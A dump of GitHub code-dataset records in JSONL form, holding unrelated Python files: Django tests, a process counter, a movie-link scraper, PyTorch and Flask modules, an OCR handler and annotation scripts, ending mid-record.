test_list(self):\n resp = self.client.get(reverse('articles'))\n\n self.assertEqual(resp.status_code, 200)\n\n data = resp.content.decode('utf-8')\n self.assertIn(self.article.title, data)\n\n def test_unauthorized(self):\n self.logout()\n\n resp = self.client.get(reverse('articles'))\n self.assertRedirects(resp, reverse('login'))\n\n\nclass TestArticleCreateView(BaseTest):\n\n def setUp(self) -> None:\n self.create_and_login(\"test@test.com\", \"test\")\n\n self.data = {\n 'title': 'Test title',\n 'text': 'Test text',\n 'author': mixer.blend(Author).pk\n }\n\n def test_create(self):\n resp = self.client.post(reverse('articles-create'), data=self.data)\n self.assertRedirects(resp, reverse('articles'))\n\n article = Article.objects.get(title=self.data['title'].upper())\n self.assertEqual(article.text, self.data['text'])\n self.assertEqual(article.author.pk, self.data['author'])\n\n def test_create_without_author(self):\n self.fail(\"Write later\")\n\n def test_unauthorized(self):\n self.logout()\n\n resp = self.client.get(reverse('articles-create'))\n self.assertRedirects(resp, reverse('login'))","repo_name":"MikhailKravets/group_blog","sub_path":"articles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32891656792","text":"#!/usr/bin/python\r\n# - Purpose:\r\n# \r\n# - Author:\r\n# \r\n# - Contact for questions and/or comments:\r\n# \r\n# - Parameters:\r\n# < accepted arguments>\r\n# - Version Releases and modifications.\r\n# \r\n\r\n### START OF MODULE IMPORTS\r\nimport sys\r\nfrom subprocess import Popen, PIPE\r\nfrom collections import Counter\r\n### END OF MODULE IMPORTS\r\n\r\n### START OF GLOBAL VARIABLES DECLARATION\r\nARGS = sys.argv\r\nNARGS = len(ARGS[1:])\r\n\r\n### END OF GLOBAL VARIABLES DECLARATION\r\n\r\n### START OF FUNCTIONS DECLARATION\r\n# --------------------------------------------------------------- #\r\ndef parse_args():\r\n \"\"\"\r\n Purpose:\r\n To check validity of number and values of the arguments given\r\n Parameters:\r\n \"\"\"\r\n if NARGS != 1:\r\n print(\"Usage: {} \".format(ARGS[0]))\r\n exit(1)\r\n# --------------------------------------------------------------- #\r\n### END OF FUNCTIONS DECLARATION\r\n\r\n### START OF CLASS DEFINITIONS\r\n# --------------------------------------------------------------- #\r\n# --------------------------------------------------------------- #\r\n### END OF CLASS DEFINITIONS\r\n\r\n### START OF MAIN PROGRAM\r\nparse_args()\r\nuser=ARGS[1]\r\nprocs = list()\r\nreport = dict()\r\nans_cmd = [\"/usr/bin/ps\", \"-o\", \"comm\", \"-u\", user]\r\n\r\n# Running the command\r\noutput = Popen(ans_cmd, stdout=PIPE, stderr=PIPE)\r\n\r\n# Parsing the process output\r\nfor line in output.stdout:\r\n if \"COMM\" not in line:\r\n procs.append(line.strip('\\n'))\r\n\r\nreport['Total Procs'] = len(procs) # Number of Procs\r\nreport.update(Counter(procs)) # Counting the Procs\r\n\r\n# Printing the output\r\nprint('Total Procs:{};{}'.format(report.pop('Total Procs'),str(report).strip('{').strip('}'))\r\n .replace(', ',';').replace(': ',':'))\r\n\r\n### END OF MAIN PROGRAM","repo_name":"rudaum/EasyManagement-20180911","sub_path":"main/lib/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"70714077029","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 21 15:57:53 2021\r\n\r\n@author: kingb\r\n\"\"\"\r\n###电影天堂部分电影下载链接\r\n\r\n#1、获取首页源码\r\n#2、筛选目标代码\r\n#3、进入下载页面获取url\r\n#4、遍历写入文件\r\n\r\nimport requests\r\nimport re\r\nimport csv\r\n\r\n#1、获取首页源码\r\nurl = 'https://www.dytt8.net/index.htm'\r\nresp = requests.get(url,verify=False)\r\nresp.encoding = 'gbk'\r\n\r\n\r\n#2、筛选目标代码\r\nojb1 = re.compile('新片精品.*?

    (?P.*?)
',re.S)\r\nojb2 = re.compile(\"]\",re.S)\r\nojb3 = re.compile('◎片  名(?P.*?)
.*?href=\"(?P.*?)\"',re.S)\r\nresult1 = ojb1.search(resp.text)\r\nresult2 = ojb2.finditer(result1.group())\r\n\r\nf = open('http.csv',mode='w',encoding='utf-8')\r\nwrit = csv.writer(f)\r\n#3、进入下载页面获取url\r\ndic = {}\r\nfor it in result2:\r\n resp2 = requests.get('https://www.dytt8.net'+it.group('indx'),verify=False)\r\n resp2.encoding = 'gbk'\r\n result3 = ojb3.search(resp2.text)\r\n dic = result3.groupdict()\r\n writ.writerow(dic.values())#4、遍历写入文件\r\nf.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"tianhao99/Python","sub_path":"Python练习/re电影天堂下载链接.py","file_name":"re电影天堂下载链接.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23073237395","text":"import os\nimport os.path as osp\nimport numpy as np\nimport random\n#import matplotlib.pyplot as plt\nimport collections\nimport torch\nimport torchvision\nfrom torch.utils import data\nfrom PIL import Image\n\nclass cityscapesDataSetLabel(data.Dataset):\n def __init__(self, root, list_path, max_iters=None, crop_size=(321, 321), mean=(128, 128, 128), set='val', label_folder=None,translated=False):\n self.root = root\n self.list_path = list_path\n self.crop_size = crop_size\n self.mean = mean\n self.img_ids = [i_id.strip() for i_id in open(list_path)]\n self.translated=translated\n if translated == True:\n self.img_ids = [i_id.split('/')[-1] for i_id in self.img_ids]\n else:\n self.root=osp.join(self.root, \"leftImg8bit\")\n if not max_iters==None:\n self.img_ids = self.img_ids * int(np.ceil(float(max_iters) / len(self.img_ids)))\n self.files = []\n self.set = set\n self.label_folder = label_folder\n name = self.img_ids[0]\n print(osp.join(self.root, \"%s/%s\" % (self.set, name)))\n if self.translated == True:\n print(self.label_folder + \"/%s\" % name)\n else:\n print(self.label_folder+\"/%s\" %name.split('/')[1])\n def __len__(self):\n return len(self.img_ids)\n\n def __getitem__(self, index):\n name = self.img_ids[index]\n image = Image.open(osp.join(self.root, \"%s/%s\" % (self.set, name))).convert('RGB')\n if self.translated==True:\n label = Image.open(self.label_folder+\"/%s\" %name)\n else:\n label = Image.open(self.label_folder+\"/%s\" %name.split('/')[1])\n # resize\n image = image.resize(self.crop_size, Image.BICUBIC)\n image = np.asarray(image, np.float32)\n label = np.asarray(label, np.float32)\n size = image.shape\n image = image[:, :, ::-1] # change to BGR\n image -= self.mean\n image = image.transpose((2, 0, 1))\n return image.copy(), label.copy(), np.array(size), name\n","repo_name":"royee182/DPL","sub_path":"DPL_master/data/cityscapes_dataset_label.py","file_name":"cityscapes_dataset_label.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"71"} +{"seq_id":"38322826059","text":"from random import *\n\nm = []\nk = 0\nmaximum = 0\ns = []\n\nrow = int(input('input n of row = '))\nline = int(input('input n of line = '))\n\ndef chet(massive):\n summ = 0\n for i in massive:\n if i >= 0 and i % 2 == 0:\n summ += i\n return(summ)\n\nfor i in range(row):\n a = []\n for j in range(line):\n a.append(randint(-10,10))\n m.append(a)\n if 0 not in a:\n k = k + 1\n\nwill_sorted = sorted(m,key=chet)\nprint('Отсортированный массив:',*will_sorted,sep='\\n')\nprint('Количество строк, не содержащих ни одного нулевого элемента',k)","repo_name":"Salamander-m/mf","sub_path":"python andreev/lab_5/lab_5_2.py","file_name":"lab_5_2.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71838713831","text":"import os\nimport re\nimport flask\nimport engineio\nimport light.helper\n\nfrom http import cookies\nfrom light.cache import Cache\nfrom light.constant import Const\nfrom light.model.datarider import Rider\nfrom light.http.context import Context\nfrom light.configuration import Config\nfrom light.http import response, websocket\nfrom light.i18n import I18n\n\nCONST = Const()\nMETHODS = ['GET', 'POST', 'PUT', 'DELETE', 'GET', 'GET', 'GET', 'GET']\n\n\ndef dispatch(app):\n bind_api(app)\n bind_route(app)\n return bind_websocket(app)\n\n\ndef bind_websocket(app):\n if os.getenv(CONST.ENV_LIGHT_APP_WEBSOCKET, 'on') == 'off':\n return\n\n async_mode = 'gevent_uwsgi'\n if os.getenv(CONST.ENV_LIGHT_APP_DEV) == 'true':\n async_mode = 'gevent'\n\n eio = engineio.Server(async_mode=async_mode)\n\n @eio.on('connect')\n def connect(sid, environ):\n print('websocket connect')\n\n cookie = cookies.SimpleCookie(environ['HTTP_COOKIE'])\n session = websocket.create_session(app, cookie)\n websocket.connect(sid, eio, session, environ)\n\n @eio.on('disconnect')\n def disconnect(sid):\n print('websocket disconnect')\n websocket.disconnect(sid)\n\n @eio.on('message')\n def message(sid, data):\n websocket.message(sid, data)\n\n return eio\n\n\ndef bind_api(app):\n boards = Cache.instance().get(CONST.SYSTEM_DB_BOARD)\n rider = Rider.instance()\n\n for board in boards:\n\n action = board['action']\n api = board['api']\n class_name = board['class']\n class_folder = board['path']\n method = board['type']\n print('>>>> ', api, class_name, action, METHODS[method])\n\n # try lookup controllers class\n path = light.helper.project_path('controllers', class_folder)\n clazz = light.helper.resolve(name=class_name, path=path)\n if clazz:\n if hasattr(clazz, action):\n add_api_rule(app, api, clazz, action, method)\n continue\n\n # try lookup system class\n path = light.helper.core_path('model')\n clazz = light.helper.resolve(name=class_name, path=path)\n if clazz:\n if hasattr(clazz, action):\n add_api_rule(app, api, clazz, action, method)\n continue\n\n # try lookup data rider\n if hasattr(rider, class_name):\n clazz = getattr(rider, class_name)\n if hasattr(clazz, action):\n add_api_rule(app, api, clazz, action, method)\n continue\n\n\ndef bind_route(app):\n routes = Cache.instance().get(CONST.SYSTEM_DB_ROUTE)\n\n for route in routes:\n action = route['action']\n url = route['url']\n class_name = route['class']\n template = route['template']\n print('>>>> ', url, action, template)\n\n # try lookup controllers class\n path = light.helper.project_path('controllers')\n clazz = light.helper.resolve(name=class_name, path=path)\n if clazz:\n if hasattr(clazz, action):\n add_html_rule(app, url, clazz, action, template)\n continue\n\n # render html\n add_html_rule(app, url, None, None, template)\n\n\ndef add_api_rule(app, api, clazz, action, method):\n def func(**kwargs):\n handler = Context()\n handler.extend_params(kwargs)\n data, error = getattr(clazz, action)(handler)\n return response.send(handler, data, error)\n\n api = re.sub('/:(\\w+)', '/<\\\\1>', api)\n app.add_url_rule(api, endpoint=api, view_func=func, methods=[METHODS[method]])\n\n\ndef add_html_rule(app, url, clazz, action, template):\n def func(**kwargs):\n handler = Context()\n handler.extend_params(kwargs)\n\n data = dict()\n data['req'] = flask.request\n data['handler'] = handler\n data['user'] = handler.user\n data['conf'] = Config()\n data['environ'] = os.environ\n data['dynamic'] = func_dynamic\n data['csrftoken'] = flask.g.csrftoken\n data['i'] = I18n.instance().i\n data['catalog'] = I18n.instance().catalog\n\n if clazz:\n data['data'] = getattr(clazz, action)(handler)\n\n return light.helper.load_template(template).render(data)\n\n url = re.sub('/:(\\w+)', '/<\\\\1>', url)\n app.add_url_rule(url, endpoint=url, view_func=func)\n\n\ndef func_dynamic(url):\n static = Config.instance().app.static\n stamp = Config.instance().app.stamp\n\n if '?' in url:\n return '{url}&stamp={stamp}'.format(static=static, url=url, stamp=stamp)\n\n return '{static}{url}?stamp={stamp}'.format(static=static, url=url, stamp=stamp)\n","repo_name":"Python3pkg/LightCorePy","sub_path":"light/http/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"35661735399","text":"from odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\nclass AccountBankStatement(models.Model):\n _inherit = 'account.bank.statement'\n\n name = fields.Char(string='Reference',\n states={'open': [('readonly', False)]},\n copy=False,\n readonly=True,\n compute=\"_compute_name\",\n store=True)\n \n @api.depends('move_line_ids.move_id.name')\n def _compute_name(self):\n for line in self.move_line_ids:\n ref = ''\n if line.move_id:\n name = line.move_id.mapped(\"name\")\n for move in name:\n ref += move\n self.name = ref\n\n","repo_name":"soikat9/GLS_UAT_FINAL7_USER","sub_path":"od_journal_sequence/models/account_bank_statement.py","file_name":"account_bank_statement.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72038885671","text":"import torch\nfrom transformers import T5ForConditionalGeneration,T5Tokenizer\nimport nltk\nnltk.download('punkt')\nnltk.download('brown')\nnltk.download('wordnet')\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nimport string\nimport pke\nimport traceback\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import sent_tokenize\nfrom flashtext import KeywordProcessor\nimport random\nimport numpy as np\nfrom utils import logger\n\nclass Helper:\n def __init__(self):\n # Initializing the logger object\n self.file_object = open(\"./Logs/helper_log.txt\", 'a+')\n self.log_writer = logger.App_Logger()\n \n def set_seed(self, seed: int):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n \n def postprocesstext (self, content):\n try:\n final=\"\"\n for sent in sent_tokenize(content):\n sent = sent.capitalize()\n final = final +\" \"+sent\n return final\n \n except Exception as ex:\n self.log_writer.log(self.file_object, 'Error occured while running the postprocesstext function. Error:: %s' % ex)\n raise ex\n \n def summarizer(self, text):\n \"\"\"\n Text summarization using T5-base model.\n \"\"\"\n try:\n model = T5ForConditionalGeneration.from_pretrained('t5-base')\n tokenizer = T5Tokenizer.from_pretrained('t5-base')\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = model.to(device)\n text = text.strip().replace(\"\\n\",\" \")\n text = \"summarize: \"+text\n max_len = 512\n encoding = tokenizer.encode_plus(text,max_length=max_len, pad_to_max_length=False,truncation=True, return_tensors=\"pt\").to(device)\n\n input_ids, attention_mask = encoding[\"input_ids\"], encoding[\"attention_mask\"]\n\n outs = model.generate(input_ids=input_ids,\n attention_mask=attention_mask,\n early_stopping=True,\n num_beams=3,\n num_return_sequences=1,\n no_repeat_ngram_size=2,\n min_length = 75,\n max_length=300)\n\n\n dec = [tokenizer.decode(ids,skip_special_tokens=True) for ids in outs]\n summary = dec[0]\n summary = self.postprocesstext(summary)\n summary= summary.strip()\n return summary\n \n except Exception as ex:\n self.log_writer.log(self.file_object, 'Error occured while running the summerizer function. Error:: %s' % ex)\n raise ex\n \n def get_nouns_multipartite(self, content):\n \"\"\" \n Answer Span Extraction (Keywords and Noun Phrases)\n \"\"\"\n out=[]\n try:\n extractor = pke.unsupervised.MultipartiteRank()\n extractor.load_document(input=content)\n # not contain punctuation marks or stopwords as candidates.\n pos = {'PROPN','NOUN'}\n #pos = {'PROPN','NOUN'}\n stoplist = list(string.punctuation)\n stoplist += ['-lrb-', '-rrb-', '-lcb-', '-rcb-', '-lsb-', '-rsb-']\n stoplist += stopwords.words('english')\n extractor.candidate_selection(pos=pos, stoplist=stoplist)\n # build the Multipartite graph and rank candidates using random walk,\n # alpha controls the weight adjustment mechanism, see TopicRank for\n # threshold/method parameters.\n extractor.candidate_weighting(alpha=1.1,\n threshold=0.75,\n method='average')\n keyphrases = extractor.get_n_best(n=15)\n \n for val in keyphrases:\n out.append(val[0])\n return out\n \n except Exception as ex:\n self.log_writer.log(self.file_object, 'Error occured while running the summerizer function. Error:: %s' % ex)\n raise ex\n \n def get_keywords(self, originaltext,summarytext):\n try:\n keywords = self.get_nouns_multipartite(originaltext)\n print (\"keywords unsummarized: \",keywords)\n keyword_processor = KeywordProcessor()\n for keyword in keywords:\n keyword_processor.add_keyword(keyword)\n\n keywords_found = keyword_processor.extract_keywords(summarytext)\n keywords_found = list(set(keywords_found))\n print (\"keywords_found in summarized: \",keywords_found)\n\n important_keywords =[]\n for keyword in keywords:\n if keyword in keywords_found:\n important_keywords.append(keyword)\n\n return important_keywords[:4]\n \n except Exception as ex:\n self.log_writer.log(self.file_object, 'Error occured while running the get_keywords function. Error:: %s' % ex)\n raise ex","repo_name":"dipesg/Question-and-Answer","sub_path":"utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":5198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"25691301419","text":"class Solution:\r\n def findErrorNums(self, nums: List[int]) -> List[int]:\r\n check = set(range(1,len(nums)+1))\r\n \r\n res = []\r\n \r\n for i in nums:\r\n if i in check:\r\n check.remove(i)\r\n \r\n else:\r\n res.append(i) \r\n \r\n res.extend(list(check))\r\n return res","repo_name":"kumar-vasu/100daysofcode2022","sub_path":"Day56/leetcode_645.py","file_name":"leetcode_645.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18156659924","text":"from maps.models import Map\nfrom wms.models import Layer\n\ndef set_server(server):\n for m in Map.objects.filter(name__istartswith='cluster'):\n for layer in m.layer_set.all():\n layername = layer.layer.layername\n try:\n new_layer = server.layer_set.get(layername=layername)\n except Layer.DoesNotExist:\n continue\n layer.layer = new_layer\n layer.save(update_fields=('layer',))\n ","repo_name":"acaciawater/gw4e","sub_path":"maps/scripts/set_server.py","file_name":"set_server.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16186364049","text":"try:\n import Image\nexcept ImportError as e:\n from PIL import Image\n\nimport io\nimport pytesseract\nimport urllib.request\nimport os\nfrom uuid import uuid4\nfrom urllib.parse import urlparse\nfrom os.path import splitext\nimport base64\nimport binascii\n\n\nALLOWED_IMAGE_TYPE = [\".jpeg\", \".png\", \".jpg\"]\n\ndef get_ext(url):\n parsed = urlparse(url)\n _, ext = splitext(parsed.path)\n return ext\n\n\ndef save_image_from_url(url):\n \"\"\"Saves image from an URL to local and retruns path\"\"\"\n \n ext = get_ext(url)\n local_file_path = \"/tmp/\" + str(uuid4()) + ext\n urllib.request.urlretrieve(url, local_file_path)\n return local_file_path\n\n\ndef save_image_from_base64(encoded_string, ext):\n \"\"\"Saves image to local from base64 encoded string and returns path\"\"\"\n\n local_file_path = \"/tmp/\" + str(uuid4()) + \".\" + ext\n with open(local_file_path, \"wb\") as fh:\n fh.write(base64.decodebytes(bytes(encoded_string, 'utf-8')))\n return local_file_path\n\n\ndef get_image_format(base64_string):\n \"\"\"returns image format from base64 encoded string\"\"\"\n\n image_stream = io.BytesIO((base64.b64decode(base64_string)))\n image = Image.open(image_stream)\n return image.format\n\n\ndef handle(req):\n try:\n base64.decodebytes(bytes(req, 'utf-8'))\n\n try:\n image_format = get_image_format(req)\n if image_format not in ['JPG', 'JPEG', 'PNG']:\n print(\"Only JPEG or PNG images are allowed.\")\n return\n file_path = save_image_from_base64(req, image_format)\n \n except OSError as e:\n print(\"Not a valid image file. Only JPEG or PNG images base64 encoded are acceptable inputs.\")\n return\n\n except binascii.Error:\n if not len(req):\n print(\"Request body is missing.\")\n return\n \n if get_ext(req) not in ALLOWED_IMAGE_TYPE:\n print(\"Only JPEG or PNG images are allowed.\")\n return\n \n file_path = save_image_from_url(req)\n \n img = Image.open(file_path)\n text = pytesseract.image_to_string(img, lang='eng')\n os.remove(file_path)\n print(text)\n","repo_name":"viveksyngh/openfaas-ocr","sub_path":"openfaas-ocr/function/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"71"} +{"seq_id":"16732331916","text":"import json\nfrom models.Binary import Binary\nfrom models.Enums import Connective, Quantifier, Type\nfrom models.Formula import Formula\nfrom models.Function import Function\nfrom models.Unary import Unary\nfrom models.Variable import Variable\n\ndef create_formula_from_json(json_data: json) -> Formula:\n formula_type = json_data['formula_type']\n\n if Type(formula_type) == Type.BINARY:\n left = create_formula_from_json(json_data['left'])\n right = create_formula_from_json(json_data['right'])\n connective = Connective(json_data['connective'])\n is_clause = json_data['is_clause']\n var_count = json_data['var_count']\n quant_list = json_data['quant_list']\n\n return Binary(\n left,\n right,\n connective,\n is_clause,\n var_count,\n quant_list\n )\n if Type(formula_type) == Type.UNARY:\n inside = create_formula_from_json(json_data['inside'])\n quantifier = Quantifier(json_data['quantifier'])\n negation = json_data['negation']\n quant_var = json_data['quant_var']\n var_count = json_data['var_count']\n quant_list = json_data['quant_list']\n\n return Unary(\n inside,\n quantifier,\n negation,\n quant_var,\n var_count,\n quant_list\n )\n if Type(formula_type) == Type.VARIABLE:\n var_name = json_data['var_name']\n var_count = json_data['var_count']\n quant_list = json_data['quant_list']\n\n return Variable(\n var_name,\n var_count,\n quant_list\n )\n if Type(formula_type) == Type.FUNCTION:\n func_name = json_data['func_name']\n inside = create_formula_from_json(json_data['inside'])\n negation = json_data['negation']\n assigned = json_data['assigned']\n var_count = json_data['var_count']\n quant_list = json_data['quant_list']\n\n return Function(\n func_name,\n inside,\n negation,\n assigned,\n var_count,\n quant_list\n )","repo_name":"KevDev0247/proofster","sub_path":"domain/prenex_normalizer/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"41381159599","text":"# -*- coding: utf-8 -*-\nimport ast\n\n\ndef tuplemerge( list1=[], list2=[]): # (B, S)\n list = []\n for item in list2:\n for item2 in list1:\n if item[0] in item2:\n list.append((item[0], item[1] + item2[1]))\n #print(item)\n list2.remove(item)\n list1.remove(item2)\n break\n return list + list2+list1\n\nclass extractHG():\n\n def __init__(self, fileName):\n self.FileName = fileName\n self.modetime = []\n pass\n\n\n\n def timeModify(self, timelist=[], merged_bool=False):\n modetimeList = []\n\n print(self.FileName)\n\n for time in timelist:\n templist = []\n for time2 in time:\n templist.append([int(time2 / 60), int(time2 % 60)])\n modetimeList.append(templist)\n self.modetime = modetimeList\n self.merged = merged_bool\n pass\n\n def extractAnnotaton(self, shift=0, exportfile=''):\n print(exportfile)\n if self.merged:\n merged_directory = 'Merge/'\n else:\n merged_directory = 'Original/'\n\n\n ReadFromAnnotation = open('Annotationlist/Annotationlist_'+self.FileName+'.txt', 'r')\n WriteToTxt = open('Annotationlist/' + merged_directory+exportfile+'/HighlightAnnotation_'+self.FileName+'_'+exportfile+'.txt', 'w')\n starttime = ReadFromAnnotation.readline().rstrip().split(':')\n print(starttime)\n starttime[0] = int(starttime[0])\n starttime[1] = int(starttime[1])\n highlighttimes = []\n for time in self.modetime:\n templist = []\n for time2 in time:\n a = str(int((time2[1]+starttime[1]) / 60+time2[0]+starttime[0]))\n b = str((time2[1]+starttime[1]) % 60)\n templist.append((a if len(a) > 1 else '0'+a)+':'+(b if len(b) > 1 else '0'+b))\n highlighttimes.append(templist)\n if self.merged:\n print(highlighttimes)\n for highlighttime in highlighttimes:\n\n Alluserplayer = []\n Alluseraction = []\n Poweruserplayer = []\n Poweruseraction = []\n Normaluserplayer = []\n Normaluseraction = []\n ReadFromAnnotation.seek(0)\n for line in ReadFromAnnotation:\n # print(line)\n if line.rstrip() in highlighttime:\n # print(line.rstrip())\n ReadFromAnnotation.readline().rstrip()\n Alluserplayer = tuplemerge(Alluserplayer, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n # print(Alluserplayer)\n ReadFromAnnotation.readline()\n Alluseraction = tuplemerge(Alluseraction, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n ReadFromAnnotation.readline()\n ReadFromAnnotation.readline()\n Poweruserplayer = tuplemerge(Poweruserplayer, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n ReadFromAnnotation.readline()\n Poweruseraction = tuplemerge(Poweruseraction, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n ReadFromAnnotation.readline()\n ReadFromAnnotation.readline()\n Normaluserplayer = tuplemerge(Normaluserplayer, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n ReadFromAnnotation.readline()\n Normaluseraction = tuplemerge(Normaluseraction, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n\n WriteToTxt.write(str(highlighttime)+'\\n')\n # print(highlighttime)\n WriteToTxt.write('Alluser\\n')\n WriteToTxt.write(str(sorted(Alluserplayer, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write(str(sorted(Alluseraction, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write('PowerUser\\n')\n WriteToTxt.write(str(sorted(Poweruserplayer, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write(str(sorted(Poweruseraction, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write('NormalUser\\n')\n WriteToTxt.write(\n str(sorted(Normaluserplayer, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write(\n str(sorted(Normaluseraction, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n\n ReadFromAnnotation.close()\n return 0\n\nif __name__ == '__main__':\n\n # 3_05\n ex = extractHG('3_05')\n ex.timeModify([[53], [75], [23], [83], [165], [54]])\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[53, 54], [75], [23], [83], [165]], True)\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[53], [23], [165], [75], [54], [18], [83], [74], [17], [13], [46], [11], [22], [37], [137]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[53, 54], [22, 23], [165], [74, 75], [18], [83], [17], [13], [46], [11], [37], [137]], True)\n ex.extractAnnotaton(0, 'MT')\n\n # 3_06\n ex = extractHG('3_06')\n ex.timeModify([[58], [62], [59], [126], [184], [135], [54], [125], [55], [49], [63]])\n ex.extractAnnotaton(0, 'HITS')\n #ex.timeModify([[58, 59], [62, 63], [125, 126], [184], [135], [54, 55], [49]], True)\n ex.timeModify([[58, 59], [62, 63], [125, 126], [182], [135], [54, 55], [49]], True)\n ex.extractAnnotaton(0, 'HITS')\n # 58->37:20\n ex.timeModify([[58], [62], [59], [183], [125], [48], [55], [135], [19], [54], [49], [51], [50], [63], [182]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[58, 59], [62, 63], [182], [125], [48, 49, 50, 51], [54, 55], [135], [19], [182]], True)\n ex.extractAnnotaton(0, 'MT')\n\n # 7_09\n ex = extractHG('7_09')\n ex.timeModify([[71], [75], [70], [72], [69], [141], [76], [131], [68], [152], [57], [132]])\n ex.extractAnnotaton(0, 'HITS')\n ex.timeModify([[68, 69, 70, 71, 72], [75, 76], [141], [131, 132], [152], [57]], True)\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[71], [70], [72], [75], [69], [57], [76], [68], [141], [56], [73], [131], [58], [152], [142]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[68, 69, 70, 71, 72, 73], [75, 76], [56, 57, 58], [141, 142], [131], [152]], True)\n\n ex.extractAnnotaton(0, 'MT')\n\n # 7_10\n ex = extractHG('7_10')\n ex.timeModify([[133], [198], [130], [195], [199], [146], [183], [196], [149], [201], [137], [189]])\n ex.extractAnnotaton(0, 'HITS')\n ex.timeModify([[133], [198, 199], [130], [195, 196], [146], [183], [149], [201], [137], [189]], True)\n\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[133], [198], [199], [130], [195], [201], [134], [200], [196], [190], [146], [149], [51], [189], [153]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[133], [198, 199, 200], [130], [195, 196], [134], [189, 190], [146], [149], [51], [153]], True)\n\n ex.extractAnnotaton(0, 'MT')\n\n # 7_13\n ex = extractHG('7_13')\n ex.timeModify([[157], [64], [50], [65], [85], [86], [51], [161], [89], [158]])\n ex.extractAnnotaton(0, 'HITS')\n ex.timeModify([[157, 158], [64, 65], [50, 51], [85, 86], [161], [89]], True)\n\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[64], [65], [50], [157], [51], [86], [85], [135], [158], [89], [161], [136], [52], [66], [162]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[64, 65, 66], [50, 51, 52], [157, 158], [85, 86], [135, 136], [89], [161, 162]], True)\n\n ex.extractAnnotaton(0, 'MT')\n\n # 7_14\n ex = extractHG('7_14')\n ex.timeModify([[63], [178], [174], [189], [80], [179], [188], [62], [109], [177], [140], [64], [175], [110]])\n ex.extractAnnotaton(0, 'HITS')\n ex.timeModify([[62, 63, 64], [177, 178, 179], [174, 175], [188, 189], [80], [109, 110], [140]], True)\n\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[63], [178], [174], [179], [189], [62], [54], [64], [80], [188], [53], [110], [109], [177], [159]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[62, 63, 64], [177, 178, 179], [174], [188, 189], [53, 54], [80], [109, 110], [159]], True)\n\n ex.extractAnnotaton(0, 'MT')\n","repo_name":"nightheronry/HITS-SHiD","sub_path":"extractHG.py","file_name":"extractHG.py","file_ext":"py","file_size_in_byte":8377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14462590622","text":"'''\nCreated on Jul 22, 2017\n\n@author: arnon\n'''\nimport os\nimport pickle\n\n\nclass Recovery(object):\n def __init__(self, name, assoc_path, location=None):\n '''\n Args:\n name 